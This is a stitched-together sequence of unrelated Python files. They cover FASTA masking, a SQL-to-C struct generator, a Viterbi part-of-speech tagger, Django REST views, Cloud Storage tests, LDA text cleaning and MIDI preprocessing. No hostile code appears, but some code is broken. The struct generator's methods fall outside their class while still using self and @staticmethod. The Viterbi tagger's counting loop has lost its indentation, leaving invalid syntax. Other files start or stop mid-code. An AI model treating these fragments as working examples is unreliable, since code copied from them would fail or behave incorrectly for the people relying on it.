    linear and equivalent character-for-character.
    """
    return "".join("N" if s.islower() else s for s in seq)
if __name__=="__main__":
    # Python 2 script: hard-mask a FASTA file (lowercase bases -> 'N'),
    # writing the result to stdout. Headers pass through unchanged.
    programName=argv[0]
    args=argv[1:]
    try:
        filename,=args
    except:
        printUsageAndExit(programName)
    fil=generic_istream(filename)
    for lin in fil:
        lin=lin.strip()
        if len(lin)<1:
            continue
        if lin[0]!=">": #header ignore
            lin=softMaskToHardMaskSeq(lin) #convert soft to hard
        print >> stdout,lin
    fil.close()
|
from typing import List
from sql_types import SqlType, SqlColumn
from function import FunctionTemplate, MacroDefinition
class Prop:
    """A named property and its SQL column description."""
    def __init__(self, name: str, proptype: SqlColumn):
        self.name = name          # property / column name
        self.proptype = proptype  # SqlColumn describing the SQL type
class Struct:
    def __init__(self, name: str, columns: List[SqlColumn]):
        """Model a generated C struct backed by a SQL table's columns."""
        # assert columns[0].proptype == SqlType.PK_LONG
        self.members = columns               # ordered SQL columns
        self.name = name                     # C struct tag
        self.typedef_name = name.upper()     # typedef alias, e.g. "user" -> "USER"
        self.enum_name = name.upper() + "_E"
        # Function templates attached later — TODO confirm by whom.
        self.methods: List[FunctionTemplate] = []
    def __getitem__(self, key) -> SqlColumn:
        """Index straight into the column list."""
        return self.members[key]
    def __setitem__(self, key, value):
        """Replace the column at the given index."""
        self.members[key] = value
    def __str__(self):
        """Render the C struct definition plus its typedef declaration."""
        out = ""
        out += "struct {name} {{\n".format(name=self.name)
        out += "".join(["\t" + self.format_prop(prop) + "\n" for prop in self.members])
        out += "};\n\n"
        out += "typedef struct {name} {typedef};\n\n".format(name=self.name, typedef=self.typedef_name)
        return out
    def __repr__(self) -> str:
        """Debug listing: one `name : type` line per column."""
        out = ""
        for prop in self.members:
            out += "{:10} : {}\n".format(prop.name, prop.proptype)
        return out
    @staticmethod
    def format_prop(prop: SqlColumn):
        """
        Formats the struct memeber for generating header files.

        Maps each SQL column type to its C member declaration; unknown
        types abort via assert.
        """
        if prop.proptype == SqlType.VARCHAR:
            return "char {name}[{size}];".format(name=prop.name, size=prop.size)
        elif prop.proptype == SqlType.TEXT:
            return "char {name}[{size}];".format(name=prop.name, size=prop.size)
        elif prop.proptype == SqlType.PK_LONG:
            return "uint {name};".format(name=prop.name)
        elif prop.proptype == SqlType.FK_LONG:
            # Foreign keys become pointers to the referenced struct; the
            # "_id"/"id_" affix is stripped to get the struct name.
            return "struct {name}* {name};".format(name=prop.name.replace("_id", "").replace("id_", ""))
        elif prop.proptype == SqlType.LONG:
            return "uint {name};".format(name=prop.name)
        elif prop.proptype == SqlType.DATE:
            return "struct tm {name};".format(name=prop.name)
        else:
            msg = f"SQL type not handled '{prop}'"
            assert False, msg
    def col_count(self):
        """
        Returns the number of columns.
        """
        return len(self.members)
    def param_count(self):
        """
        Returns the number of columns excluding Primary Key.

        Assumes the first member is the primary key — TODO confirm
        (see the commented assert in __init__).
        """
        return len(self.members) - 1
    def get_col_buffer_definitions(self):
        """
        Defines buffers which are used for SQL Result set binding.

        Emits C declarations: length/null/error arrays plus one buffer
        per column (char[] for string-ish types, uint for integer types).
        """
        out = "/* Generated using get_col_buffer_definitions()*/\n"
        out += """unsigned long lengths[RES_COL_COUNT];
my_bool is_null[RES_COL_COUNT];
my_bool error[RES_COL_COUNT];\n"""
        for prop in self.members:
            out += "\t"
            if prop.proptype in [SqlType.VARCHAR, SqlType.DATE, SqlType.TEXT]:
                out += "char {col}_buffer[{size}];\n".format(col=prop.name, size=prop.size)
            elif prop.proptype in [SqlType.LONG, SqlType.FK_LONG, SqlType.PK_LONG]:
                out += "uint {col}_buffer;\n".format(col=prop.name)
        return out
    def get_buffer_bindings(self):
        """
        Generates binding for every struct member in the query. Buffers to which members are bound
        must be defined with get_col_buffer_definitions().
        """
        out = "/* Generated using get_buffer_bindings()*/\n"
        out += "MYSQL_BIND param[RES_COL_COUNT];\n"
        out += "memset(param, 0, sizeof(param));\n"
        for i, prop in enumerate(self.members):
            out += self.bind_prop_buffer(i, prop)
        return out
    @staticmethod
    def bind_prop_buffer(index, prop):
        """
        Generates code that binds parameter structs memembers to predefined stack allocated buffers.
        Buffers must be defined with get_col_buffer_definitions().
        """
        out = """
    /* {type} COLUMN */
    param[{index}].buffer_type = {mysql_type};
    param[{index}].buffer = &{name}_buffer;
    param[{index}].is_null = &is_null[{index}];
    param[{index}].length = &lengths[{index}];
    param[{index}].error = &error[{index}];
    """
        reg_type = None
        mysql_type = None
        if prop.proptype in [SqlType.VARCHAR, SqlType.TEXT]:
            reg_type = "STRING"
            mysql_type = "MYSQL_TYPE_STRING"
            # String buffers also need an explicit length for the bind.
            out += "param[{index}].buffer_length = {len};\n".format(index=index, len=prop.size)
        elif prop.proptype == SqlType.DATE:
            reg_type = "DATE"
            mysql_type = "MYSQL_TYPE_STRING"
            out += "param[{index}].buffer_length = BUFFER_SIZE;\n"
        elif prop.proptype in [SqlType.LONG, SqlType.FK_LONG, SqlType.PK_LONG]:
            reg_type = "INTEGER"
            mysql_type = "MYSQL_TYPE_LONG"
        else:
            msg = f"SQL type not handled '{prop}'"
            assert False, msg
        assert reg_type is not None
        assert mysql_type is not None
        return out.format(index=index, type=reg_type, mysql_type=mysql_type, name=prop.name)
def col_fetch(self):
    """
    Generate the result-fetch loop: for every fetched row, copy each bound
    column buffer into a freshly calloc'd struct and append it to the
    linked result list.  Buffers must already be defined and bound
    (get_col_buffer_definitions() / get_buffer_bindings()).
    """
    cols = ""
    for i, prop in enumerate(self.members):
        if prop.proptype in [SqlType.VARCHAR, SqlType.TEXT]:
            # NULL string columns become the literal text "NULL".
            cols += """
if (is_null[{index}]) {{
strcpy((({name}*) row->data)->{col}, "NULL");
}} else {{
strncpy((({name}*) row->data)->{col}, {col}_buffer, lengths[{index}]);
}}""".format(index=i, col=prop.name, name=self.typedef_name)
        elif prop.proptype == SqlType.DATE:
            # NULL dates are deliberately left zeroed (calloc'd struct).
            cols += """
if (is_null[{index}]) {{
// strcpy((({name}*) row->data)->{col}, "NULL");
}} else {{
mysql_timecpystr(&(({name}*) row->data)->{col}, {col}_buffer);
}}""".format(index=i, col=prop.name, name=self.typedef_name)
        elif prop.proptype in [SqlType.LONG, SqlType.PK_LONG]:
            cols += """
if (is_null[{index}]) {{
(({name}*) row->data)->{col} = 0;
}} else {{
(({name}*) row->data)->{col} = {col}_buffer;
}}""".format(index=i, col=prop.name, name=self.typedef_name)
        elif prop.proptype == SqlType.FK_LONG:
            # Foreign keys are resolved eagerly via <fk>_find_by_id;
            # NULL columns become NULL pointers.
            cols += """
if (is_null[{index}]) {{
(({name}*) row->data)->{col_name} = NULL;
}} else {{
(({name}*) row->data)->{col_name} = {col_name}_find_by_id(conn, {col}_buffer);
}}""".format(index=i, col=prop.name, col_name=prop.name.replace("_id", "").replace("id_", ""),
             name=self.typedef_name)
        else:
            msg = f"SQL type not handled '{prop}'"
            assert False, msg
    # Outer loop walks the singly linked list to append each new row.
    return """
/* Generated using col_fetch()*/
while (!mysql_stmt_fetch(stmt)) {{
res->count++;
row = calloc(1, sizeof(struct sql_result_row));
if (res->results == NULL) {{
res->results = row;
}} else {{
curr = res->results;
while (curr->next != NULL) {{
curr = curr->next;
}}
curr->next = row;
}}
row->data = calloc(1, sizeof({struct_name}));
{cols}
}}""".format(cols=cols, struct_name=self.name.upper())
def get_col_param_buffers(self):
    """
    Generate param buffers for all struct members except the first.

    The member at index 0 is skipped and the remaining members are bound
    starting at parameter slot 0 (slot == member index - 1).
    """
    out = "/* Generated using get_col_param_buffers() */\n"
    for slot, member in enumerate(self.members[1:]):
        out += self.col_param_from_prop(slot, member, self.name)
    return out
def get_col_param_buffer(self, props: List[str]):
    """
    Generate param buffers for the struct members whose names appear in
    `props`, preserving member declaration order.
    """
    selected = [member for member in self.members if member.name in props]
    pieces = [
        "/* Generated using get_col_param_buffers() */\n",
        "MYSQL_BIND param[PARAM_COUNT];\n",
        "memset(param, 0, sizeof(param));\n",
    ]
    pieces.extend(self.col_param_from_prop(slot, member, self.name)
                  for slot, member in enumerate(selected))
    return "".join(pieces)
@staticmethod
def col_param_from_prop(num, prop, name):
    """
    Allocates respective param buffers that store struct data used in the SQL query.
    Buffers are used in queries such as 'UPDATE' or 'INSERT'.

    Example:
        /* STRING PARAM */
        param[1].buffer = malloc(name_len);
        param[1].buffer_type = MYSQL_TYPE_STRING;
        param[1].buffer_length = name_len;
        strncpy(param[1].buffer, libraryT->name, name_len);

    Make sure to free buffers using col_param_buffer_free().

    :param num: parameter slot index.
    :param prop: struct member descriptor (uses .name, .proptype, .size).
    :param name: struct base name; the generated code reads from '<name>T'.
    """
    # Common allocation template; type-specific copy code is appended below
    # and everything is formatted once at return.
    out = """
/* {type} PARAM */
param[{index}].buffer = malloc({buffer_size});
param[{index}].buffer_type = {mysql_type};
"""
    reg_type = None
    mysql_type = None
    buffer_size = None
    if prop.proptype in [SqlType.VARCHAR, SqlType.TEXT]:
        reg_type = "STRING"
        mysql_type = "MYSQL_TYPE_STRING"
        # Relies on a '<col>_len' local emitted by col_param_length().
        buffer_size = "{col}_len".format(col=prop.name)
        out += """param[{index}].buffer_length = {col}_len;
strncpy(param[{index}].buffer, {name}T->{col}, {col}_len);"""
    elif prop.proptype in [SqlType.LONG, SqlType.PK_LONG]:
        reg_type = "INTEGER"
        mysql_type = "MYSQL_TYPE_LONG"
        buffer_size = "sizeof(uint)"
        out += "memcpy(param[{index}].buffer, &{name}T->{col}, {buffer_size});"
    elif prop.proptype == SqlType.FK_LONG:
        reg_type = "INTEGER"
        mysql_type = "MYSQL_TYPE_LONG"
        buffer_size = "sizeof(uint)"
        # FK members hold a pointer to the referenced struct; copy its id
        # field ({col_fk} is the member name with the id affix stripped).
        out += "memcpy(param[{index}].buffer, &{name}T->{col_fk}->{col}, {buffer_size});"
    elif prop.proptype == SqlType.DATE:
        reg_type = "DATE"
        mysql_type = "MYSQL_TYPE_DATE"
        buffer_size = "{}".format(prop.size)
        out += "mysql_timecpy(param[{index}].buffer, &{name}T->{col});"
    else:
        msg = f"SQL type not handled '{prop}'"
        assert False, msg
    assert reg_type is not None
    assert mysql_type is not None
    assert buffer_size is not None
    return out.format(index=num, type=reg_type, mysql_type=mysql_type, col=prop.name, name=name,
                      buffer_size=buffer_size, col_fk=prop.name.replace("_id", "").replace("id_", ""))
def col_param_buffer_free(self, num: int = None):
    """
    Generate code freeing allocated param buffers after use.

    :param num: number of leading param buffers to free; when None, all
        of them (self.param_count()) are freed.
    :return: generated C source as a string.
    """
    out = "/* Generated using col_param_buffer_free() */\n"
    # Both branches previously emitted identical loops; collapse them.
    count = self.param_count() if num is None else num
    for i in range(count):
        out += "free(param[{index}].buffer);\n".format(index=i)
    return out
def col_buffer_free(self, num: int = None):
    """
    Generate code freeing allocated column buffers after use.

    :param num: number of leading buffers to free; when None, one per
        result column (self.col_count()).
    :return: generated C source as a string.
    """
    out = "/* Generated using col_buffer_free() */\n"
    # Both branches previously emitted identical loops; collapse them.
    count = self.col_count() if num is None else num
    for i in range(count):
        out += "free(param[{index}].buffer);\n".format(index=i)
    return out
def get_update_fk(self):
    """
    Generate code persisting foreign-key references before an 'UPDATE' or
    'INSERT': a NULL reference logs to stderr and returns 0U; a reference
    with id == 0 is inserted; anything else is updated.
    """
    out = "/* Generated using get_update_fk() */\n"
    for prop in self.members:
        if prop.proptype == SqlType.FK_LONG:
            # fk_name is the member name with the id affix stripped;
            # fk_id is the raw id member name inside the referenced struct.
            out += """
if ({name}T->{fk_name} == NULL){{
fprintf(stderr, "%s->%s is NULL\\n", "{name}", "{fk_name}");
return 0U;
}} else if ({name}T->{fk_name}->{fk_id} == 0) {{
{fk_name}_insert(conn, {name}T->{fk_name});
}} else {{
{fk_name}_update(conn, {name}T->{fk_name});
}}""".format(name=self.name, fk_name=prop.name.replace("_id", "").replace("id_", ""), fk_id=prop.name)
    return out
def col_param_lengths(self, func_ref: FunctionTemplate):
    """
    Define the MYSQL_BIND param array plus '#define' size macros and stack
    length variables for every string-typed column field.
    """
    out = "/* Generated using col_param_lengths() */\n"
    out += "MYSQL_BIND param[PARAM_COUNT];\n"
    # Fixed mojibake: the previous line emitted 'memset(¶m, ...)' (an HTML
    # '&para;' corruption of '&param'), which is not valid C.  Pass the
    # array itself, matching get_col_param_buffer()/get_buffer_bindings().
    out += "memset(param, 0, sizeof(param));\n"
    for prop in self.members:
        if prop.proptype in [SqlType.VARCHAR, SqlType.TEXT]:
            out += self.col_param_length(prop, func_ref)
    return out
def col_param_length(self, prop, func_ref: FunctionTemplate):
    """
    Register a '#define <NAME>_SIZE' macro on `func_ref` and emit the stack
    variable holding the actual string length of the column field.
    """
    macro_name = "{name_upper}_SIZE".format(name_upper=prop.name.upper())
    func_ref.add_macro_def(MacroDefinition(macro_name, str(prop.size)))
    template = """
unsigned long {name}_len;
{name}_len = strnlen({struct}T->{name}, {name_upper}_SIZE);
"""
    return template.format(name=prop.name, name_upper=prop.name.upper(), struct=self.name)
def col_update_params(self, func_ref: FunctionTemplate):
    """
    Allocate and bind the param buffers used in execute methods.
    Be sure to free allocated buffers with col_param_buffer_free().
    """
    out = "/* Generated using col_update_params() */\n"
    out += "MYSQL_BIND param[PARAM_COUNT];\n"
    # Fixed mojibake: the previous line emitted 'memset(¶m, ...)' (an HTML
    # '&para;' corruption of '&param'), which is not valid C.  Pass the
    # array itself, matching get_col_param_buffer()/get_buffer_bindings().
    out += "memset(param, 0, sizeof(param));\n"
    # Rotate the first member to the end -- presumably so the primary key
    # is bound last for the UPDATE's WHERE clause; confirm against the
    # statement generator.
    memb = self.members.copy()
    memb.append(memb.pop(0))
    for prop in memb:
        if prop.proptype in [SqlType.VARCHAR, SqlType.TEXT]:
            out += self.col_param_length(prop, func_ref)
    for i, prop in enumerate(memb):
        out += self.col_param_from_prop(i, prop, self.name)
    return out
def get_insert_assertions(self):
    """
    Generate basic sanity assertions for the 'INSERT' query: the primary
    key must still be 0 and VARCHAR fields must be non-trivial strings.
    """
    out = "/* Generated using get_insert_assertions() */\n"
    for member in self.members:
        if member.proptype == SqlType.PK_LONG:
            pk = self.get_pk()
            if pk is not None:
                out += "assert({name}T->{pk_name} == 0);\n".format(
                    name=self.name, pk_name=pk.name)
        elif member.proptype == SqlType.VARCHAR:
            out += "assert(strnlen({name}T->{prop_name}, STRING_SIZE) > 1);\n".format(
                name=self.name, prop_name=member.name)
    return out
def get_free_members(self):
    """Generate C code freeing a struct instance and its FK sub-structs."""
    pieces = [
        "/* Generated by get_free_members() */\n",
        "assert(ptr != NULL);\n",
        "\n",
        "if (*ptr != NULL){\n",
    ]
    for member in self.members:
        if member.proptype == SqlType.FK_LONG:
            fk = member.name.replace("_id", "").replace("id_", "")
            pieces.append("{name}_free(&((*ptr)->{name}));\n".format(name=fk))
    pieces.append("free(*ptr);\n")
    pieces.append("}")
    return "".join(pieces)
def get_params(self):
    """Return a new list of all members except the first."""
    return list(self.members[1:])
def get_pk(self):
    """Return the first PK_LONG member, or None when there is none."""
    return next((member for member in self.members
                 if member.proptype == SqlType.PK_LONG), None)
|
import FWCore.ParameterSet.Config as cms
def customise(process):
    """Enable neutron-background simulation in the muon system.

    Applies the HP neutron physics list with thermal neutron scattering.
    """
    from SimG4Core.Application.NeutronBGforMuons_cff import neutronBG

    process = neutronBG(process)
    if hasattr(process, 'g4SimHits'):
        physics = process.g4SimHits.Physics
        physics.type = cms.string('SimG4Core/Physics/FTFP_BERT_HP_EML')
        physics.ThermalNeutrons = cms.untracked.bool(True)
    return process
|
"""The smart list name."""
from jupiter.core.domain.entity_name import EntityName
# Thin marker subclass: used purely as a distinct domain type; all behavior
# comes from EntityName.
class SmartListName(EntityName):
    """The smart list name."""
|
from nltk.corpus import brown
from multiprocessing import Pool
import string
import nltk
from nltk.tokenize import RegexpTokenizer
from nltk.corpus import stopwords
import re
# Get brown data
rawData = brown.tagged_sents()
# Lower case, stopword removal, trim sentences
def preprocess(rawSentence):
    """Lower-case, de-punctuate and stopword-filter a tagged sentence.

    Keeps at most the first 20 (word, tag) pairs; words that are empty
    after tokenization/stopword removal are dropped.
    """
    sentence = []
    # Hoisted out of the per-word loop: the tokenizer is invariant and
    # stopwords.words() rebuilds its list on every call; a set also makes
    # membership tests O(1).
    tokenizer = RegexpTokenizer(r'\w+')
    stop_words = set(stopwords.words('english'))
    for index, (word, tag) in enumerate(rawSentence):
        if index >= 20:
            break
        tokens = tokenizer.tokenize(word.lower())
        filtered = ''.join(w for w in tokens if w not in stop_words)
        if filtered != '':
            sentence.append((filtered, tag))
    return sentence
# Preprocess the corpus, keeping only sentences longer than two tokens.
data = []
for rawSentence in rawData:
    sentence = preprocess(rawSentence)
    if len(sentence) > 2:
        # Reuse the already-computed result; the old code ran the (slow)
        # preprocess() a second time for every kept sentence.
        data.append(sentence)
# Create tag set
# Count how often each tag occurs across the preprocessed corpus.
count_tags = {}
for sent in data:
    for word, tag in sent:
        count_tags[tag] = count_tags.setdefault(tag, 0) + 1
# Keep only frequent tags (> 500 occurrences); everything else is later
# collapsed into the catch-all 'NA' tag.
tags = set()
for tag, count in count_tags.items():
    if count >500:
        tags.add(tag)
tags.add('NA')
# Change tags with less numbers to NA
totalWords = 0
for sent in data:
    for i, (word, tag) in enumerate(sent):
        totalWords+=1
        if tag not in tags:
            sent[i] = (word, 'NA')
# 80/20 train/test split (NOTE: Python 2 script -- print statements).
trainData = data[0: int(0.80*len(data))]
testData = data[int(0.80*len(data)): len(data)]
print "data ready after preprocessing"
print "Train set size (#sentences): ", len(trainData), " Test set size: ", len(testData)
#Viterbi Algorithm
##Get counts for calculation of probabilities from train data.
counts = {}
# We need 3 counts:
# - count of (word, tag)
# - count of (tag1)
# - count of (tag1, tag2)
# - count of (tag1, tag2, tag3)
for sent in trainData:
sent = [('', 'START'),('', 'START')] + sent + [('', 'STOP')]
for index, tagged_word in enumerate(sent):
counts[tagged_word] = counts.setdefault(tagged_word, 0) + 1
counts[tagged_word[1]] = counts.setdefault(tagged_word[1], 0) + 1
try :
if index - 1 >= 0:
prev = sent[index - 1]
counts[(prev[1], sent[index][1])] = counts.setdefault((prev[1], sent[index][1]), 0) + 1
try:
if index-2 >= 0:
prevPrev = sent[index - 2]
counts[(prevPrev[1], prev[1], sent[index][1])] = counts.setdefault((prevPrev[1], prev[1], sent[index][1]), 0) + 1
except:
pass
except:
pass
print "training done: calculated counts on train set"
def getProb(v, z, u=None):
    """Probability estimates from the module-level `counts` table.

    Two-argument form: emission probability P(v | z) = count(v, z)/count(z),
    with a floor count of 1 for unseen (word, tag) pairs.
    Three-argument form: transition probability of tag v after tags z, u,
    linearly interpolated over trigram, bigram and unigram estimates.
    """
    alpha1, alpha2, alpha3 = 0.5, 0.3, 0.2
    assert(alpha1 + alpha2 + alpha3 == 1)
    if u is None:  # was `u==None`; identity test is the correct idiom
        assert(counts[z]!=0)
        # Use .get() instead of setdefault(): a pure probability lookup
        # must not insert phantom keys into the shared counts table.
        return (counts.get((v,z), 1)*1.0)/counts[z]
    else:
        den1 = counts.get((z,u), 0)
        if den1 == 0:
            p1 = 0
        else:
            p1 = (counts.get((z,u,v), 0)*1.0)/den1
        p2 = (counts.get((u,v), 0)*1.0)/counts[u]
        p3 = (counts[v]*1.0)/totalWords
        return alpha1*p1 + alpha2*p2 + alpha3*p3
def multiRunWrapper(args):
    # Unpack-and-call shim so calcPi can be used with multiprocessing
    # Pool.map, which passes a single argument tuple.
    return calcPi(*args)
def calcPi(k, u, v, tagged_word):
    # Viterbi recurrence: pi(k, u, v) = max over z of
    #   pi(k-1, z, u) * q(v | z, u) * e(word | v),
    # returning ((k, u, v), argmax z, max value).
    # NOTE(review): reads AND writes the module-level Y dict and reads the
    # module-level prevPi set by the decoding loop -- only safe when called
    # from that loop (or the Pool wrapper above).
    lst = []
    Y[k-2] = getTagSet(k-2)
    for z in Y[k-2]:
        lst.append(((k,u,v), z, prevPi[(k-1, z, u)]*getProb(v, z, u)*getProb(tagged_word[0], v)))
    return max(lst, key = lambda item:item[2])
def getTagSet(k):
    """Possible tags at position k: only START before the sentence starts,
    otherwise the full (module-level) tag set."""
    return ['START'] if k < 1 else tags
numWords = 0
totalCorrects = 0
# Viterbi decoding over the held-out test set (Python 2 script).
for sent in testData:
    # pi[(k, u, v)]: best score of a tag sequence ending in (u, v) at k.
    pi = {(0,'START', 'START'):1}
    bPtr = {}
    for k, tagged_word in enumerate(sent):
        prevPi = pi
        pi = {}
        k += 1  # positions are 1-based in the recurrence
        print '>>>>>>>>', k, tagged_word
        Y = {}
        Y[k-1] = getTagSet(k-1)
        Y[k] = getTagSet(k)
        # Multiprocess code
        #p = Pool(4)
        #res = p.map(multiRunWrapper, [(k,u,v,tagged_word) for u in Y[k-1] for v in Y[k]])
        #for item in res:
        #    bPtr[item[0]] = item[1]
        #    pi[item[0]] = item[2]
        # Simple code
        for u in Y[k-1]:
            for v in Y[k]:
                temp = calcPi(k, u, v, tagged_word)
                bPtr[(k,u,v)] = temp[1]
                pi[(k,u,v)] = temp[2]
    # Termination: pick the best final tag bigram including the STOP
    # transition, then follow back-pointers to recover the sequence.
    predTags = []
    lst = []
    for u in Y[k-1]:
        for v in Y[k]:
            lst.append(((u,v),pi[(k,u,v)]*getProb('STOP', u, v)))
    temp = max(lst, key=lambda item:item[1])[0]
    predTags = [temp[0], temp[1]]
    for k in range(k-2, 0, -1) :
        predTags = [bPtr[(k+2, predTags[0], predTags[1])]] + predTags
    # Per-sentence and running accuracy.
    correct = 0
    for index, tagged_word in enumerate(sent):
        if tagged_word[1] == predTags[index]:
            correct+=1
    print predTags
    print "accuracy = ", correct*1.0/len(sent)
    numWords+=len(sent)
    totalCorrects+=correct
    print "Overall accuracy uptill now= ", totalCorrects*1.0/numWords
#sent = [(u'doubt', u'NN') ,
# (u'mrs', u'NP') ,
# (u'meeker', u'NP') ,
# (u'snubbed', u'VBN') ,
# (u'many', 'NA') ,
# (u'time', u'NN') ,
# (u'felt', u'VBD') ,
# (u'grief', u'NN') ,
# (u'passing', u'NN')
# ]
#
#pi = {(0,'START', 'START'):1}
#bPtr = {}
#tempPi = []
#for k, tagged_word in enumerate(sent):
# tempPi.append(pi)
# prevPi = pi
# pi = {}
# k += 1
#
# print '>>>>>>>>', k, tagged_word
# Y = {}
# Y[k-1] = getTagSet(k-1)
# Y[k] = getTagSet(k)
# # Multiprocess code
# #p = Pool(4)
# #res = p.map(multiRunWrapper, [(k,u,v,tagged_word) for u in Y[k-1] for v in Y[k]])
# #for item in res:
# # bPtr[item[0]] = item[1]
# # pi[item[0]] = item[2]
# # Simple code
# for u in Y[k-1]:
# for v in Y[k]:
# temp = calcPi(k, u, v, tagged_word)
# bPtr[(k,u,v)] = temp[1]
# pi[(k,u,v)] = temp[2]
#predTags = []
#lst = []
#for u in Y[k-1]:
# for v in Y[k]:
# lst.append(((u,v),pi[(k,u,v)]*getProb('STOP', u, v)))
#temp = max(lst, key=lambda item:item[1])[0]
#predTags = [temp[0], temp[1]]
#for k in range(k-2, 0, -1) :
# predTags = [bPtr[(k+2, predTags[0], predTags[1])]] + predTags
#correct = 0
#for index, tagged_word in enumerate(sent):
# if tagged_word[1] == predTags[index]:
# correct+=1
#print predTags
#print "accuracy = ", correct*1.0/len(sent)
#numWords+=len(sent)
#totalCorrects+=correct
#print "Overall accuracy uptill now= ", totalCorrects*1.0/numWords
|
# 5. Assert a test case true if the input falls under the range[-5,5]
def assert_test(num):
    """Raise AssertionError unless num lies in the inclusive range [-5, 5]."""
    assert num >= -5 and num <= 5
#test
# In-range input: the assert passes and the call returns None.
# NOTE(review): the following out-of-range call assert_test(6) is expected
# to raise AssertionError and abort the script -- presumably intentional
# as a demonstration.
assert_test(4)
assert_test(6) |
import os
from google.cloud import storage
from django.test import TestCase
from django.conf import settings
from .storage_service import FileStorageService
class FileStorageTests(TestCase):
    """Integration tests for FileStorageService against Google Cloud Storage.

    NOTE(review): these tests talk to the real 'csre-utilities.appspot.com'
    bucket, so they require credentials and network access.
    """

    @classmethod
    def setUpTestData(cls):
        # Shared handle to the bucket the service under test writes to.
        storage_client = storage.Client()
        cls.bucket = storage_client.get_bucket('csre-utilities.appspot.com')

    def _assert_stores_file(self, upload_name, file_type):
        """Upload a mock file and assert a real, existing Blob was created.

        Shared body of the three format-specific tests below, which were
        previously three copy-pasted identical methods.
        """
        storage_service = FileStorageService()
        path = os.path.join(settings.MOCK_FILE_LOCATION, upload_name)
        with open(path, 'rb') as file:
            file_bytes = file.read()
        file_blob = storage_service.store_file(file_bytes, upload_name, file_type)
        self.assertTrue(file_blob.exists())
        self.assertTrue(isinstance(file_blob, storage.Blob))

    def test_storage_service_creates_blob(self):
        storage_service = FileStorageService()
        intx = storage_service.get_or_create_blob('test')
        self.assertIsNotNone(intx)
        self.assertTrue(isinstance(intx, storage.Blob))

    def test_storage_service_saves_csv(self):
        self._assert_stores_file('inspfile.csv', 'intx')

    def test_storage_service_saves_txt(self):
        self._assert_stores_file('apprfile-mock.txt', 'aptx')

    def test_storage_service_saves_xlsx(self):
        self._assert_stores_file('okce-mock.xlsx', 'reok')

    def test_gets_reader(self):
        storage_service = FileStorageService()
        stream_reader = storage_service.stream_reader('intx')
        self.assertIsNotNone(stream_reader)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 17 14:55:53 2017
@author: Administrator
"""
from gensim import corpora, models, similarities
import matplotlib.pyplot as plt
import numpy as np
import os
# Clean every raw file: strip blank lines, brackets and commas, collapse it
# onto a single line, and write the result into rawdata1/<same name>.
filelist = os.listdir('C:\\Users\\Administrator\\Desktop\\original_lda\\rawdata')
for item in filelist:
    iitem = 'C:\\Users\\Administrator\\Desktop\\original_lda\\rawdata\\' + item
    string5 = ''
    # `with` closes the handle deterministically; the old code never closed
    # the input file at all.
    with open(iitem, 'r') as src:
        for line in src:
            if line.strip() != '':
                cleaned = (str(line.strip())
                           .replace('\n', ' ')
                           .replace('[', '')
                           .replace(']', '')
                           .replace(',', ' ')
                           .replace('nbsp/n', ''))
                string5 = string5 + ' ' + cleaned
    # NOTE(review): mode 'a' appends on every rerun (kept for behavioral
    # compatibility); 'w' may have been intended.
    with open('C:\\Users\\Administrator\\Desktop\\original_lda\\rawdata1\\' + item, 'a') as newfile:
        newfile.write(string5)
        newfile.write('\n')
# Concatenate every intermediate file into a single corpus file.  `with`
# blocks close all handles; the old code never closed the input files.
filelist = os.listdir('C:\\Users\\Administrator\\Desktop\\original_lda\\rawdata1')
with open('C:\\Users\\Administrator\\Desktop\\original_lda\\ddata.txt', 'a') as newfile:
    for item in filelist:
        iitem = 'C:\\Users\\Administrator\\Desktop\\original_lda\\rawdata1\\' + item
        with open(iitem, 'r') as src:
            for txt in src:
                newfile.write(txt)
|
from crawler import download_all, download_srt_file, download_improve
# XuetangX courseware page whose content should be downloaded.
url = 'http://www.xuetangx.com/courses/course-v1:TsinghuaX+20220332X+2018_T2/courseware/a1039c2138944208a18a83d3c14dd799/f33a4efe2738403ba73cccd510fafb38/'
if __name__ == '__main__':
    # Use the improved downloader; the plain subtitle download is kept
    # below as a disabled alternative.
    download_improve(url)
    # download_srt_file(url)
|
from django.shortcuts import render
from rest_framework.decorators import api_view
from .serializer import MovieSerializer
from .models import Movie
from rest_framework.response import Response
# Create your views here.
@api_view(['GET'])
def apiOverview(request):
    """Return a map of the API's available endpoints."""
    return Response({
        'List': '/get-movie/',
        'Create': '/post-movie/',
        'Update': '/update-movie/',
    })
@api_view(['GET'])
def AllMovie(request):
    """List every movie, serialized."""
    queryset = Movie.objects.all()
    return Response(MovieSerializer(queryset, many=True).data)
@api_view(['GET'])
def GetMovie(request, pk):
    """Retrieve a single movie by primary key."""
    record = Movie.objects.get(id=pk)
    return Response(MovieSerializer(instance=record).data)
@api_view(['PUT'])
def PostMovie(request):
    """Create a movie from the request payload.

    NOTE(review): this create endpoint is registered for PUT, not POST --
    kept as-is so existing clients keep working, but worth confirming.
    """
    serializer = MovieSerializer(data=request.data)
    if serializer.is_valid():
        serializer.save()
        return Response(serializer.data)
    # Previously invalid input fell through and still returned 200 with the
    # unsaved payload; surface the validation errors instead.
    return Response(serializer.errors, status=400)
@api_view(['PUT'])
def UpdateMovie(request, pk):
    """Update an existing movie identified by pk."""
    movie = Movie.objects.get(id=pk)
    serializer = MovieSerializer(instance=movie, data=request.data)
    if serializer.is_valid():
        serializer.save()
        return Response(serializer.data)
    # Invalid data used to print 'NO SAVING' and still return 200 with the
    # unsaved data; report the validation errors with a 400 instead (the
    # debug prints are removed).
    return Response(serializer.errors, status=400)
@api_view(['DELETE'])
def DeleteMovie(request, pk):
    """Delete the movie identified by pk.

    Fixed: the first parameter was misnamed 'render'; Django passes the
    HttpRequest positionally, so renaming it to the conventional 'request'
    is safe for all callers.
    """
    Movie.objects.get(id=pk).delete()
    return Response('Movie Deleted')
import os, time, datetime
from preprocess import PreprocessingPipeline
from random import shuffle
# Preprocessing hyper-parameters.
sampling_rate = 125
n_velocity_bins = 32
seq_length = 1024
# Vocabulary size: 256 base tokens plus one bin per time step and one per
# velocity bin -- presumably MIDI note on/off events; confirm against the
# encoder in preprocess.py.
n_tokens = 256 + sampling_rate + n_velocity_bins
def main():
    """Run the MIDI preprocessing pipeline over ./data and report timing.

    NOTE(review): the trailing print/exit() look like leftover debugging --
    they dump every encoded sequence and abort unconditionally.
    """
    pipeline = PreprocessingPipeline(input_dir="data", stretch_factors=[0.975, 1, 1.025],
        split_size=30, sampling_rate=sampling_rate, n_velocity_bins=n_velocity_bins,
        transpositions=range(-2,3), training_val_split=0.9, max_encoded_length=seq_length+1,
        min_encoded_length=257)
    pipeline_start = time.time()
    pipeline.run()
